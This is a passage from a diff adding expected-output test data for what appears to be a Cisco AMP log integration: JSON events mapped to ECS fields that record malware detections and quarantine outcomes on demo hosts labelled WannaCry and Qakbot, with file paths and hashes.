+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419281601187807332",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T18:03:55.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe",
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843679334Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419281601187807000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.24D004A104-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419281601187807332",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "lsass.exe",
+                "pid": 708,
+                "hash": {
+                    "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
+                    "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
+                    "md5": "4e568dbe3fff1a0025eb432dc929b78f"
+                }
+            },
+            "@timestamp": "2021-01-14T18:03:52.000Z",
+            "file": {
+                "name": "mssecsvc.exe",
+                "path": "\\\\?\\C:\\Windows\\mssecsvc.exe",
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "db349b97c37d22f5ea1d1841e3c89eb4",
+                    "e889544aff85ffaf8b0d0da705105dee7c97fe26"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843681225Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419281588302905000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419281588302905443",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T18:03:52.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843683113Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6419281588302905000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "detection_id": "6419281588302905443",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843684983Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411538569722069000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411538569722068995",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843686880Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411538569722069000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411538569722068994",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843688761Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6411538569722069000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411538569722068993",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "name": "igvj$vN.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe",
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843690628Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411538569722069000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Auto.BAC7BC5281.in10.tht.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411538569722068995",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "name": "6951045.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe",
+                "hash": {
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843705689Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411538569722069000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Auto.BAC7BC5281.in10.tht.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411538569722068994",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T17:51:19.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1",
+                    "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "md5": "dc41e47ebba549ec5e616ed9e88a0376"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff",
+                    "dc41e47ebba549ec5e616ed9e88a0376",
+                    "99fffe78e0cbd7b508eed13a8633903dd89ed5f1"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:29.843709643Z",
